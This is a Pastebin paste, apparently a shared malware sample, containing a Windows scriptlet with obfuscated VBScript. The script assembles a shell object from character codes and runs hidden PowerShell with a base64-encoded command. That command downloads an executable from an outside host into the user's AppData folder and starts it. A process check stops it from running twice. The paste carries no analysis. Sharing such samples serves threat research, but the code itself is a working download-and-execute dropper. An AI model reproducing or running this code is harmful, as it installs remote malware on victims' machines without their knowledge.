API tools faq
paste
Advertisement
James_inthe_box

Scriptlet

James_inthe_box
Dec 1st, 2017
186
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.71 KB | None | 0 0
raw download clone embed print report
  1. <?XML version="1.0"?>
  2. <scriptlet>
  3. <registration
  4. description="g3FqiZ30ATtgS3XaE71WMVZQMPJwqdVqA97QgJJgm7tas"
  5. progid="aXy.bj5"
  6. version="1.0"
  7. classid="{1AE493A0-8E8F-4786-8468-3C903D89344C}"
  8. remotable="true"
  9. >
  10. </registration>
  11. <script language="VBScript">
  12. <![CDATA[
  13. if not veFN8o then
  14. dIm zkDXBZOXcrrFmu : dIM ZEJoCzDboBZvyj : sEt zkDXBZOXcrrFmu = cReateOBjECT ( ChrW(&H57) & StrReverse(Chr(&H53)) & StrReverse(ChrW(&H43)) & ChrW(&H72) & StrReverse(Chr(&H69)) & StrReverse(Chr(&H50)) & StrReverse(ChrW(&H54)) & StrReverse(Chr(&H2E)) & StrReverse(ChrW(&H53)) & Chr(&H48) & ChrW(&H65) & StrReverse(Chr(&H6C)) & StrReverse(ChrW(&H6C)) ) : ZEJoCzDboBZvyj = " pOwerShEll.exE -Ex BYpass -nOp -w hIDDeN -ec CQAoAG4AZQBXAC0AbwBCAGoARQBDAFQAIABzAHkAcwBUAGUAbQAuAE4AZQB0AC4AdwBlAEIAYwBMAEkARQBuAHQAKQAuAGQATwBXAE4AbABPAEEAZABGAEkAbABFACgACQAdIGgAdAB0AHAAOgAvAC8ANQBtAGkAbABlAHMALgBjAG8AbQAuAHMAZwAvAGwAaQBiAHIAYQByAGkAZQBzAC8AcABoAHAAdQB0AGYAOAAvAG0AYgBzAHQAcgBpAG4AZwAvAGYAYQBkAGEAYQAuAGUAeABlAB0gCQAsAAkAHSAkAGUAbgB2ADoAQQBQAHAARABhAFQAQQBcAGgAbwBtAGUALgBlAHgAZQAdIAkAKQAJADsACQBTAFQAQQByAFQACQAdICQAZQBOAHYAOgBhAFAAcABkAEEAVABBAFwAaABvAG0AZQAuAGUAeABlAB0g " : zkDXBZOXcrrFmu.ruN CHR ( 34 ) & zkDXBZOXcrrFmu.exPaNdeNVIroNmEntstRinGS( Chr(&H25) & StrReverse(Chr(&H73)) & StrReverse(ChrW(&H79)) & ChrW(&H53) & StrReverse(Chr(&H54)) & ChrW(&H45) & StrReverse(Chr(&H4D)) & StrReverse(Chr(&H52)) & StrReverse(ChrW(&H6F)) & ChrW(&H6F) & StrReverse(ChrW(&H54)) & StrReverse(Chr(&H25)) ) & StrReverse(ChrW(&H5C)) & ChrW(&H53) & ChrW(&H79) & StrReverse(Chr(&H73)) & ChrW(&H54) & ChrW(&H65) & StrReverse(ChrW(&H4D)) & ChrW(&H33) & ChrW(&H32) & Chr(&H5C) & Chr(&H57) & StrReverse(ChrW(&H69)) & StrReverse(ChrW(&H6E)) & Chr(&H44) & Chr(&H4F) & StrReverse(Chr(&H57)) & StrReverse(ChrW(&H73)) & Chr(&H50) & ChrW(&H4F) & StrReverse(Chr(&H57)) & ChrW(&H45) & Chr(&H72) & ChrW(&H73) & StrReverse(Chr(&H68)) & ChrW(&H45) & StrReverse(Chr(&H6C)) & ChrW(&H4C) & Chr(&H5C) & StrReverse(ChrW(&H56)) & StrReverse(ChrW(&H31)) & Chr(&H2E) & Chr(&H30) & StrReverse(Chr(&H5C)) & Chr(&H50) & StrReverse(ChrW(&H6F)) & Chr(&H77) & Chr(&H45) & Chr(&H52) & Chr(&H53) & Chr(&H68) & ChrW(&H45) & ChrW(&H4C) & Chr(&H4C) & StrReverse(ChrW(&H2E)) & StrReverse(ChrW(&H45)) & ChrW(&H58) & StrReverse(ChrW(&H45)) & CHr ( 34 ) & CHr ( 32 ) & Chr (34 ) & ZEJoCzDboBZvyj & cHr ( 34 ) , 0 : set zkDXBZOXcrrFmu = NoTHINg
  15. end if
  16. Function veFN8o
  17. Dim vLYABNGOT
  18. Dim vWi
  19. Dim vre
  20. Set vLYABNGOT = GetObject("winmgmts:\\.\root\cimv2").ExecQuery( _
  21. "Select * from Win32_Process where Name='cscript.exe' or Name='wscript.exe'",,48)
  22. For Each vWi in vLYABNGOT
  23. If Instr(1, vWi.CommandLine, WScript.ScriptName, 1) > 0 Then
  24. vre = vre + 1
  25. End If
  26. Next
  27. veFN8o = (vre > 1)
  28. End Function
  29. ]]>
  30. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!